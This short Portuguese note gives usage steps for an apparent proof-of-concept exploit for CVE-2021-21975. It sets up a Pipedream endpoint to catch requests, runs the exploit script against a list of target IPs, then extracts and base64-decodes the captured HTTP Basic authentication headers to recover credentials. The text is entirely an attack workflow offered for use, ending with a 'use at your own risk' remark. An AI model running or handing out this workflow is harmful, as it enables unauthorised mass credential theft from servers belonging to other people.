
#Primeiro configure o cliente pd.
#Agora execute ./pd deploy http-new-requests
#agora substitua a requisição http do pipedream ex: Randomstring.m.pipedream.net no script
#execute isso em um terminal separado - ./pd logs new-requests | tee -a req.txt
#e agora execute isso em outro terminal - python3 CVE-2021-21975.py iplist
#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt
"Esta é uma prova de conceito inicial criada quando a vulnerabilidade se tornou pública há alguns meses, então use por sua conta e risco." :V
#crédito @wabaf3t @D0rkerDevil